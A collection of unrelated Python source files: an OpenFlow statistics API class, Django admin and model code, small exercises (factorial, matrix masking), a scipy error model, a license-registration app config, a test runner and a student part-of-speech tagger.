self._set_attribute(self._SDM_ATT_MAP["VendorStatRequestsTx"], value)
def update(
self,
ActionErrorsRx=None,
AuxiliaryConnectionsUp=None,
BarrierRepliesRx=None,
BarrierRequestsTx=None,
DescriptionStatRepliesRx=None,
DescriptionStatRequestsTx=None,
EchoRepliesRx=None,
EchoRepliesTx=None,
EchoRequestsRx=None,
EchoRequestsTx=None,
ErrorsRx=None,
ExperimenterErrorsRx=None,
FeatureRepliesRx=None,
FeatureRequestsTx=None,
FlowAddsTx=None,
FlowAggregateStatRepliesRx=None,
FlowAggregateStatRequestsTx=None,
FlowDelsTx=None,
FlowModErrorsRx=None,
FlowModsTx=None,
FlowRateflowssec=None,
FlowRemovesRx=None,
FlowStatRepliesRx=None,
FlowStatRequestsTx=None,
GetAsynchronousConfigRepliesRx=None,
GetAsynchronousConfigRequestsTx=None,
GetConfigRepliesRx=None,
GetConfigRequestsTx=None,
GetQueueConfigRepliesRx=None,
GetQueueConfigRequestsTx=None,
GroupAddsTx=None,
GroupDelsTx=None,
GroupDescRepliesRx=None,
GroupDescRequestsTx=None,
GroupFeatureRepliesRx=None,
GroupFeatureRequestsTx=None,
GroupModErrorsRx=None,
GroupModsTx=None,
GroupStatRepliesRx=None,
GroupStatRequestsTx=None,
HelloErrorsRx=None,
HellosRx=None,
HellosTx=None,
InstructionErrorsRx=None,
MatchErrorsRx=None,
MeterAddsTx=None,
MeterConfigRepliesRx=None,
MeterConfigRequestsTx=None,
MeterDelsTx=None,
MeterFeatureRepliesRx=None,
MeterFeatureRequestsTx=None,
MeterModErrorsRx=None,
MeterModsTx=None,
MeterStatRepliesRx=None,
MeterStatRequestsTx=None,
OfChannelConfigured=None,
OfChannelConfiguredUp=None,
OfChannelFlapCount=None,
OfChannelLearnedUp=None,
PacketInsRx=None,
PacketOutsTx=None,
PacketinReasonAction=None,
PacketinReasonInvalidTTL=None,
PacketinReasonNoMatch=None,
PortDescRepliesRx=None,
PortDescRequestsTx=None,
PortModErrorsRx=None,
PortModsTx=None,
PortName=None,
PortStatRepliesRx=None,
PortStatRequestsTx=None,
PortStatusesRx=None,
QueueOpErrorsRx=None,
QueueStatRepliesRx=None,
QueueStatRequestsTx=None,
RequestErrorsRx=None,
RoleRepliesRx=None,
RoleRequestErrorsRx=None,
RoleRequestsTx=None,
SetAsynchronousConfigTx=None,
SetConfigTx=None,
StatRepliesRx=None,
StatRequestsTx=None,
SwitchConfigErrorsRx=None,
TableFeatureErrorsRx=None,
TableFeatureRepliesRx=None,
TableFeatureRequestsTx=None,
TableModErrorsRx=None,
TableModsTx=None,
TableStatRepliesRx=None,
TableStatRequestsTx=None,
VendorMessagesRx=None,
VendorMessagesTx=None,
VendorStatRepliesRx=None,
VendorStatRequestsTx=None,
):
# type: (bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool) -> OpenflowAggregatedStatistics
"""Updates openflowAggregatedStatistics resource on the server.
Args
----
- ActionErrorsRx (bool): Action Errors Rx
- AuxiliaryConnectionsUp (bool): Auxiliary Connections Up
- BarrierRepliesRx (bool): Barrier Replies Rx
- BarrierRequestsTx (bool): Barrier Requests Tx
- DescriptionStatRepliesRx (bool): Description Stat Replies Rx
- DescriptionStatRequestsTx (bool): Description Stat Requests Tx
- EchoRepliesRx (bool): Echo Replies Rx
- EchoRepliesTx (bool): Echo Replies Tx
- EchoRequestsRx (bool): Echo Requests Rx
- EchoRequestsTx (bool): Echo Requests Tx
- ErrorsRx (bool): Errors Rx
- ExperimenterErrorsRx (bool): Experimenter Errors Rx
- FeatureRepliesRx (bool): Feature Replies Rx
- FeatureRequestsTx (bool): Feature Requests Tx
- FlowAddsTx (bool): Flow Adds Tx
- FlowAggregateStatRepliesRx (bool): Flow Aggregate Stat Replies Rx
- FlowAggregateStatRequestsTx (bool): Flow Aggregate Stat Requests Tx
- FlowDelsTx (bool): Flow Dels Tx
- FlowModErrorsRx (bool): Flow Mod Errors Rx
- FlowModsTx (bool): Flow Mods Tx
- FlowRateflowssec (bool): Flow Rate (flows/sec)
- FlowRemovesRx (bool): Flow Removes Rx
- FlowStatRepliesRx (bool): Flow Stat Replies Rx
- FlowStatRequestsTx (bool): Flow Stat Requests Tx
- GetAsynchronousConfigRepliesRx (bool): Get Asynchronous Config Replies Rx
- GetAsynchronousConfigRequestsTx (bool): Get Asynchronous Config Requests Tx
- GetConfigRepliesRx (bool): Get Config Replies Rx
- GetConfigRequestsTx (bool): Get Config Requests Tx
- GetQueueConfigRepliesRx (bool): Get Queue Config Replies Rx
- GetQueueConfigRequestsTx (bool): Get Queue Config Requests Tx
- GroupAddsTx (bool): Group Adds Tx
- GroupDelsTx (bool): Group Dels Tx
- GroupDescRepliesRx (bool): Group Desc Replies Rx
- GroupDescRequestsTx (bool): Group Desc Requests Tx
- GroupFeatureRepliesRx (bool): Group Feature Replies Rx
- GroupFeatureRequestsTx (bool): Group Feature Requests Tx
- GroupModErrorsRx (bool): Group Mod Errors Rx
- GroupModsTx (bool): Group Mods Tx
- GroupStatRepliesRx (bool): Group Stat Replies Rx
- GroupStatRequestsTx (bool): Group Stat Requests Tx
- HelloErrorsRx (bool): Hello Errors Rx
- HellosRx (bool): Hellos Rx
- HellosTx (bool): Hellos Tx
- InstructionErrorsRx (bool): Instruction Errors Rx
- MatchErrorsRx (bool): Match Errors Rx
- MeterAddsTx (bool): Meter Adds Tx
- MeterConfigRepliesRx (bool): Meter Config Replies Rx
- MeterConfigRequestsTx (bool): Meter Config Requests Tx
- MeterDelsTx (bool): Meter Dels Tx
- MeterFeatureRepliesRx (bool): Meter Feature Replies Rx
- MeterFeatureRequestsTx (bool): Meter Feature Requests Tx
- MeterModErrorsRx (bool): Meter Mod Errors Rx
- MeterModsTx (bool): Meter Mods Tx
- MeterStatRepliesRx (bool): Meter Stat Replies Rx
- MeterStatRequestsTx (bool): Meter Stat Requests Tx
- OfChannelConfigured (bool): OF Channel Configured
- OfChannelConfiguredUp (bool): OF Channel Configured Up
- OfChannelFlapCount (bool): OF Channel Flap Count
- OfChannelLearnedUp (bool): OF Channel Learned Up
- PacketInsRx (bool): Packet Ins Rx
- PacketOutsTx (bool): Packet Outs Tx
- PacketinReasonAction (bool): PacketIn Reason Action
- PacketinReasonInvalidTTL (bool): PacketIn Reason Invalid TTL
- PacketinReasonNoMatch (bool): PacketIn Reason No Match
- PortDescRepliesRx (bool): Port Desc Replies Rx
- PortDescRequestsTx (bool): Port Desc Requests Tx
- PortModErrorsRx (bool): Port Mod Errors Rx
- PortModsTx (bool): Port Mods Tx
- PortName (bool): Port Name
- PortStatRepliesRx (bool): Port Stat Replies Rx
- PortStatRequestsTx (bool): Port Stat Requests Tx
- PortStatusesRx (bool): Port Statuses Rx
- QueueOpErrorsRx (bool): Queue Op Errors Rx
- QueueStatRepliesRx (bool): Queue Stat Replies Rx
- QueueStatRequestsTx (bool): Queue Stat Requests Tx
- RequestErrorsRx (bool): Request Errors Rx
- RoleRepliesRx (bool): Role Replies Rx
- RoleRequestErrorsRx (bool): Role Request Errors Rx
- RoleRequestsTx (bool): Role Requests Tx
- SetAsynchronousConfigTx (bool): Set Asynchronous Config Tx
- SetConfigTx (bool): Set Config Tx
- StatRepliesRx (bool): Stat Replies Rx
- StatRequestsTx (bool): Stat Requests Tx
- SwitchConfigErrorsRx (bool): Switch Config Errors Rx
- TableFeatureErrorsRx (bool): Table Feature Errors Rx
- TableFeatureRepliesRx (bool): Table Feature Replies Rx
- TableFeatureRequestsTx (bool): Table Feature Requests Tx
- TableModErrorsRx (bool): Table Mod Errors Rx
- TableModsTx (bool): Table Mods Tx
- TableStatRepliesRx (bool): Table Stat Replies Rx
- TableStatRequestsTx (bool): Table Stat Requests Tx
- VendorMessagesRx (bool): Vendor Messages Rx
- VendorMessagesTx (bool): Vendor Messages Tx
- VendorStatRepliesRx (bool): Vendor Stat Replies Rx
- VendorStatRequestsTx (bool): Vendor Stat Requests Tx
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(
self,
ActionErrorsRx=None,
AuxiliaryConnectionsUp=None,
BarrierRepliesRx=None,
BarrierRequestsTx=None,
DescriptionStatRepliesRx=None,
DescriptionStatRequestsTx=None,
EchoRepliesRx=None,
EchoRepliesTx=None,
EchoRequestsRx=None,
EchoRequestsTx=None,
ErrorsRx=None,
ExperimenterErrorsRx=None,
FeatureRepliesRx=None,
FeatureRequestsTx=None,
FlowAddsTx=None,
FlowAggregateStatRepliesRx=None,
FlowAggregateStatRequestsTx=None,
FlowDelsTx=None,
FlowModErrorsRx=None,
FlowModsTx=None,
FlowRateflowssec=None,
FlowRemovesRx=None,
FlowStatRepliesRx=None,
FlowStatRequestsTx=None,
GetAsynchronousConfigRepliesRx=None,
GetAsynchronousConfigRequestsTx=None,
GetConfigRepliesRx=None,
GetConfigRequestsTx=None,
GetQueueConfigRepliesRx=None,
GetQueueConfigRequestsTx=None,
GroupAddsTx=None,
GroupDelsTx=None,
GroupDescRepliesRx=None,
GroupDescRequestsTx=None,
GroupFeatureRepliesRx=None,
GroupFeatureRequestsTx=None,
GroupModErrorsRx=None,
GroupModsTx=None,
GroupStatRepliesRx=None,
GroupStatRequestsTx=None,
HelloErrorsRx=None,
HellosRx=None,
HellosTx=None,
InstructionErrorsRx=None,
MatchErrorsRx=None,
MeterAddsTx=None,
MeterConfigRepliesRx=None,
MeterConfigRequestsTx=None,
MeterDelsTx=None,
MeterFeatureRepliesRx=None,
MeterFeatureRequestsTx=None,
MeterModErrorsRx=None,
MeterModsTx=None,
MeterStatRepliesRx=None,
MeterStatRequestsTx=None,
OfChannelConfigured=None,
OfChannelConfiguredUp=None,
OfChannelFlapCount=None,
OfChannelLearnedUp=None,
PacketInsRx=None,
PacketOutsTx=None,
PacketinReasonAction=None,
PacketinReasonInvalidTTL=None,
PacketinReasonNoMatch=None,
PortDescRepliesRx=None,
PortDescRequestsTx=None,
PortModErrorsRx=None,
PortModsTx=None,
PortName=None,
PortStatRepliesRx=None,
PortStatRequestsTx=None,
PortStatusesRx=None,
QueueOpErrorsRx=None,
QueueStatRepliesRx=None,
QueueStatRequestsTx=None,
RequestErrorsRx=None,
RoleRepliesRx=None,
RoleRequestErrorsRx=None,
RoleRequestsTx=None,
SetAsynchronousConfigTx=None,
SetConfigTx=None,
StatRepliesRx=None,
StatRequestsTx=None,
SwitchConfigErrorsRx=None,
TableFeatureErrorsRx=None,
TableFeatureRepliesRx=None,
TableFeatureRequestsTx=None,
TableModErrorsRx=None,
TableModsTx=None,
TableStatRepliesRx=None,
TableStatRequestsTx=None,
VendorMessagesRx=None,
VendorMessagesTx=None,
VendorStatRepliesRx=None,
VendorStatRequestsTx=None,
):
# type: (bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool) -> OpenflowAggregatedStatistics
"""Finds and retrieves openflowAggregatedStatistics resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve openflowAggregatedStatistics resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all openflowAggregatedStatistics resources from the server.
Args
----
- ActionErrorsRx (bool): Action Errors Rx
- AuxiliaryConnectionsUp (bool): Auxiliary Connections Up
- BarrierRepliesRx (bool): Barrier Replies Rx
- BarrierRequestsTx (bool): Barrier Requests Tx
- DescriptionStatRepliesRx (bool): Description Stat Replies Rx
- DescriptionStatRequestsTx (bool): Description Stat Requests Tx
- EchoRepliesRx (bool): Echo Replies Rx
- EchoRepliesTx (bool): Echo Replies Tx
- EchoRequestsRx (bool): Echo Requests Rx
- EchoRequestsTx (bool): Echo Requests Tx
- ErrorsRx (bool): Errors Rx
- ExperimenterErrorsRx (bool): Experimenter Errors Rx
- FeatureRepliesRx (bool): Feature Replies Rx
- FeatureRequestsTx (bool): Feature Requests Tx
- FlowAddsTx (bool): Flow Adds Tx
- FlowAggregateStatRepliesRx (bool): Flow Aggregate Stat Replies Rx
- FlowAggregateStatRequestsTx (bool): Flow Aggregate Stat Requests Tx
- FlowDelsTx (bool): Flow Dels Tx
- FlowModErrorsRx (bool): Flow Mod Errors Rx
- FlowModsTx (bool): Flow Mods Tx
- FlowRateflowssec (bool): Flow Rate (flows/sec)
- FlowRemovesRx (bool): Flow Removes Rx
- FlowStatRepliesRx (bool): Flow Stat Replies Rx
- FlowStatRequestsTx (bool): Flow Stat Requests Tx
- GetAsynchronousConfigRepliesRx (bool): Get Asynchronous Config Replies Rx
- GetAsynchronousConfigRequestsTx (bool): Get Asynchronous Config Requests Tx
- GetConfigRepliesRx (bool): Get Config Replies Rx
- GetConfigRequestsTx (bool): Get Config Requests Tx
- GetQueueConfigRepliesRx (bool): Get Queue Config Replies Rx
- GetQueueConfigRequestsTx (bool): Get Queue Config Requests Tx
- GroupAddsTx (bool): Group Adds Tx
- GroupDelsTx (bool): Group Dels Tx
- GroupDescRepliesRx (bool): Group Desc Replies Rx
- GroupDescRequestsTx (bool): Group Desc Requests Tx
- GroupFeatureRepliesRx (bool): Group Feature Replies Rx
- GroupFeatureRequestsTx (bool): Group Feature Requests Tx
- GroupModErrorsRx (bool): Group Mod Errors Rx
- GroupModsTx (bool): Group Mods Tx
- GroupStatRepliesRx (bool): Group Stat Replies Rx
- GroupStatRequestsTx (bool): Group Stat Requests Tx
- HelloErrorsRx (bool): Hello Errors Rx
- HellosRx (bool): Hellos Rx
- HellosTx (bool): Hellos Tx
- InstructionErrorsRx (bool): Instruction Errors Rx
- MatchErrorsRx (bool): Match Errors Rx
- MeterAddsTx (bool): Meter Adds Tx
- MeterConfigRepliesRx (bool): Meter Config Replies Rx
- MeterConfigRequestsTx (bool): Meter Config Requests Tx
- MeterDelsTx (bool): Meter Dels Tx
- MeterFeatureRepliesRx (bool): Meter Feature Replies Rx
- MeterFeatureRequestsTx (bool): Meter Feature Requests Tx
- MeterModErrorsRx (bool): Meter Mod Errors Rx
- MeterModsTx (bool): Meter Mods Tx
- MeterStatRepliesRx (bool): Meter Stat Replies Rx
- MeterStatRequestsTx (bool): Meter Stat Requests Tx
- OfChannelConfigured (bool): OF Channel Configured
- OfChannelConfiguredUp (bool): OF Channel Configured Up
- OfChannelFlapCount (bool): OF Channel Flap Count
- OfChannelLearnedUp (bool): OF Channel Learned Up
- PacketInsRx (bool): Packet Ins Rx
- PacketOutsTx (bool): Packet Outs Tx
- PacketinReasonAction (bool): PacketIn Reason Action
- PacketinReasonInvalidTTL (bool): PacketIn Reason Invalid TTL
- PacketinReasonNoMatch (bool): PacketIn Reason No Match
- PortDescRepliesRx (bool): Port Desc Replies Rx
- PortDescRequestsTx (bool): Port Desc Requests Tx
- PortModErrorsRx (bool): Port Mod Errors Rx
- PortModsTx (bool): Port Mods Tx
- PortName (bool): Port Name
- PortStatRepliesRx (bool): Port Stat Replies Rx
- PortStatRequestsTx (bool): Port Stat Requests Tx
- PortStatusesRx (bool): Port Statuses Rx
- QueueOpErrorsRx (bool): Queue Op Errors Rx
- QueueStatRepliesRx (bool): Queue Stat Replies Rx
- QueueStatRequestsTx (bool): Queue Stat Requests Tx
- RequestErrorsRx (bool): Request Errors Rx
- RoleRepliesRx (bool): Role Replies Rx
- RoleRequestErrorsRx (bool): Role Request Errors Rx
- RoleRequestsTx (bool): Role Requests Tx
- SetAsynchronousConfigTx (bool): Set Asynchronous Config Tx
- SetConfigTx (bool): Set Config Tx
- StatRepliesRx (bool): Stat Replies Rx
- StatRequestsTx (bool): Stat Requests Tx
- SwitchConfigErrorsRx (bool): Switch Config Errors Rx
- TableFeatureErrorsRx (bool): Table Feature Errors Rx
- TableFeatureRepliesRx (bool): Table Feature Replies Rx
- TableFeatureRequestsTx (bool): Table Feature Requests Tx
- TableModErrorsRx (bool): Table Mod Errors Rx
- TableModsTx (bool): Table Mods Tx
- TableStatRepliesRx (bool): Table Stat Replies Rx
- TableStatRequestsTx (bool): Table Stat Requests Tx
- VendorMessagesRx (bool): Vendor Messages Rx
- VendorMessagesTx (bool): Vendor Messages Tx
- VendorStatRepliesRx (bool): Vendor Stat Replies Rx
- VendorStatRequestsTx (bool): Vendor Stat Requests Tx
Returns
-------
- self: This instance with matching openflowAggregatedStatistics resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of openflowAggregatedStatistics data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the openflowAggregatedStatistics resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserChangeForm, CustomUserCreationForm
from .models import CustomUser, UsersCount
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = CustomUser
list_display = ['username', 'first_name', 'last_name']
fieldsets = UserAdmin.fieldsets + (
(None, {'fields': ('phonenumber', 'address', 'social_network')}),
)
@admin.register(UsersCount)
class UsersCountAdmin(admin.ModelAdmin):
change_list_template = 'admin/users_count_change_list.html'
def changelist_view(self, request, extra_context=None):
response = super().changelist_view(
request,
extra_context=extra_context,
)
try:
users = response.context_data['cl'].queryset.filter(is_staff=False)
except (AttributeError, KeyError):
return response
response.context_data['amount'] = len(users)
return response
admin.site.register(CustomUser, CustomUserAdmin)
|
from datetime import timedelta
from django.db import models
from django.utils import timezone
class TelegramUser(models.Model):
"""
Telegram user
"""
id = models.BigIntegerField(primary_key=True, unique=True)
username = models.CharField(max_length=120, blank=True)
first_name = models.CharField(max_length=120)
last_name = models.CharField(max_length=120, blank=True)
is_bot = models.BooleanField(default=False)
is_manually_added = models.BooleanField(default=False)
access_count = models.IntegerField(default=0)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated_at', )
def __str__(self):
return self.first_name
|
def factorial(n):
# return 1 if n == 0 or n == 1 else n * factorial(n-1)
if n == 0 or n == 1:
return 1
else:
a = n * factorial(n - 1)
return a
# return n*factorial(n-1)
n = int(input("enter number"))
print("facorial number of {0} is {1} ".format(n, factorial(n)))
|
from scipy import stats
from spux.distributions.tensor import Tensor
from units import units
from auxiliary import auxiliary
from spux.distributions.merge import Merge
# define an error model
class Error (object):
def __init__ (self, scalar = True):
self.scalar = scalar
# auxiliary dataset loader (optional)
def auxiliary (self, time):
return auxiliary (time)
# return an error model (distribution) for the specified prediction and parameters
def distribution (self, prediction, parameters):
# specify error distributions using stats.scipy for each observed variable independently
# available options (univariate): https://docs.scipy.org/doc/scipy/reference/stats.html
distributions = {}
if self.scalar:
distributions ['position'] = stats.norm (prediction['position'], parameters['error'])
else:
distributions ['position'] = stats.norm (prediction['values']['position'], parameters['error'])
# construct a joint distribution for a vector of independent parameters by tensorization
distribution = Tensor (distributions)
distribution.setup (units = units ['observations'])
if self.scalar:
return distribution
else:
distribution_auxiliary = None # construct your auxiliary distribution here
return Merge (distribution, distribution_auxiliary)
error = Error ()
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from common import MayanAppConfig
from common.classes import Package
class AppearanceApp(MayanAppConfig):
name = 'appearance'
verbose_name = _('Appearance')
def ready(self):
super(AppearanceApp, self).ready()
Package(label='Bootstrap', license_text='''
The MIT License (MIT)
Copyright (c) 2011-2015 Twitter, Inc
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
Package(label='Animate.css', license_text='''
Animate.css is licensed under the MIT license. (http://opensource.org/licenses/MIT)
''')
Package(label='Bootswatch', license_text='''
The MIT License (MIT)
Copyright (c) 2013 Thomas Park
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
Package(label='fancyBox', license_text='''
fancyBox licensed under Creative Commons Attribution-NonCommercial 3.0 license.
''')
Package(label='jquery_lazyload', license_text='''
All code licensed under the MIT License. All images licensed under Creative Commons Attribution 3.0 Unported License. In other words you are basically free to do whatever you want. Just don't remove my name from the source.
''')
Package(label='ScrollView', license_text='''
Copyright (c) 2009 Toshimitsu Takahashi
Released under the MIT license.
''')
Package(label='Font Awesome', license_text='''
Font License
Applies to all desktop and webfont files in the following directory: font-awesome/fonts/.
License: SIL OFL 1.1
URL: http://scripts.sil.org/OFL
Code License
Applies to all CSS and LESS files in the following directories: font-awesome/css/, font-awesome/less/, and font-awesome/scss/.
License: MIT License
URL: http://opensource.org/licenses/mit-license.html
''')
Package(label='jQuery', license_text='''
Copyright jQuery Foundation and other contributors, https://jquery.org/
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/jquery/jquery
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
All files located in the node_modules and external directories are
externally maintained libraries used by this software which have their
own licenses; we recommend you read them, as their terms may differ from
the terms above.
''')
Package(label='django-widget-tweaks', license_text='''
Copyright (c) 2011-2015 Mikhail Korobov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
|
#!/usr/bin/env python
import os, sys
current_dir = os.getcwd()
test_suite_path = os.path.dirname(os.path.dirname(current_dir))
sys.path.append(test_suite_path)
import testing
problem_number = testing.parse_argv()
current_dir = os.getcwd() + '/'
exec_path = current_dir + str(problem_number) + '.py'
testing.check_executable(exec_path)
solutions_directory = current_dir + 'senior/S' + str(problem_number) + '/'
solution_file_paths = testing.get_solution_file_paths(solutions_directory)
temp_infile_path = current_dir + 's' + str(problem_number) + '.in'
temp_outfile_path = current_dir + 'progOutput.txt'
try:
testing.test_program(exec_path, solution_file_paths, temp_infile_path, temp_outfile_path)
finally:
os.system('rm -f ' + temp_infile_path + ' ' + temp_outfile_path) |
from apps.core.models.model_base import ModelBase
from django.db import models
class Participation(ModelBase):
class Status(models.TextChoices):
READY = 'ready'
PARTICIPATED = 'participated'
SUCCESS = 'success'
FAILURE = 'failure'
mission = models.ForeignKey("Mission", related_name="participated_mission", on_delete=models.CASCADE,
db_column="mission")
owner = models.ForeignKey("user.User", related_name="participated_user", on_delete=models.CASCADE,
db_column="owner")
status = models.CharField('status', max_length=15, choices=Status.choices, default=Status.READY)
start_date = models.DateTimeField(auto_now_add=True)
end_date = models.DateTimeField()
is_cron_checked = models.BooleanField(default=False)
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
if self.status == Participation.Status.SUCCESS:
self.mission.update_successful_count()
else:
self.mission.update_in_progress_count()
|
import numpy as np
m = int(input('Enter rows'))
n = int(input('Enter columns'))
l = []
b = []
for i in range(m):
l = []
for j in range(n):
e = int(input('Enter element: '))
l.append(e)
b.append(l)
print("Original matrix")
print(np.matrix(b))
for i in range(m):
for j in range(n):
if i > j or i == j:
continue
else:
b[i][j] = 0
print("Changed matrix")
print(np.matrix(b))
|
###################################
# CS B551 Fall 2020, Assignment #3
#
# Your names and user ids:
# Alex Fuerst (alfuerst), Andrew Corum (amcorum), Kaitlynne Wilkerson (kwilker)
#
# (Based on skeleton code by D. Crandall)
#
import random
import math
import define
import prob
import simple
import viterbi
# We've set up a suggested code structure, but feel free to change it. Just
# make sure your code still works with the label.py and pos_scorer.py code
# that we've supplied.
#
class Solver:
# Calculate the log of the posterior probability of a given sentence
# with a given part-of-speech labeling. Right now just returns -999 -- fix this!
def posterior(self, model, sentence, label):
if model == "Simple":
total = 1
for i in simpler:
total *= i
result = math.log(total,10)
return result
elif model == "HMM":
total = 1
for i in confidence:
total *= i
result = math.log(total, 10)
return result
else:
print("Unknown algo!")
# Do the training!
#
def train(self, data):
"""
Splits data from file into words and pos. Passes this data to the define file so that the parameters are found.
"""
for d in data:
words = d[0]
pos = d[1]
define.define(words, pos)
prob.probstart()
prob.probtran()
totalwords = prob.probout()
# Functions for each algorithm. Right now this just returns nouns -- fix this!
#
"""
The following 3 functions returns the pos per word.
"""
def simplified(self, sentence):
new = list(sentence)
total = prob.totalwords
simplepath = []
global simpler
simpler = []
for i in new:
(tag, largest) = simple.find(i, total)
if tag == None: # this works
#finds tag for word not previously seen
l = len(simplepath) -1
if len(simplepath) > 0:
l = len(simplepath) -1
tag = simple.examineTransition(simplepath[l])
else:
tag = simple.examineTransition('.')
simplepath += [tag]
simpler += [largest]
return simplepath
def hmm_viterbi(self, sentence):
new = list(sentence)
total = prob.totalwords
hmmpath = []
global h
h = []
count = 0
for i in new:
if count == 0:
viterbi.start(i, total)
else:
viterbi.rest(i, total)
count += 1
hmmpath = viterbi.trace()
hmm = []
for i in hmmpath:
hmm += [i[1]]
h += [i[0]]
return hmm
def confidence(self, sentence, answer):
global confidence
confidence = []
for i in range(0, len(sentence)):
simple.find(sentence[i], prob.totalwords)
pr = simple.con[answer[i]]
confidence += [pr]
return confidence
# This solve() method is called by label.py, so you should keep the interface the
# same, but you can change the code itself.
# It should return a list of part-of-speech labelings of the sentence, one
# part of speech per word.
#
"""
Calls the above 3 functions to display to the screen.
"""
def solve(self, model, sentence):
if model == "Simple":
return self.simplified(sentence)
elif model == "HMM":
return self.hmm_viterbi(sentence)
else:
print("Unknown algo!")
|
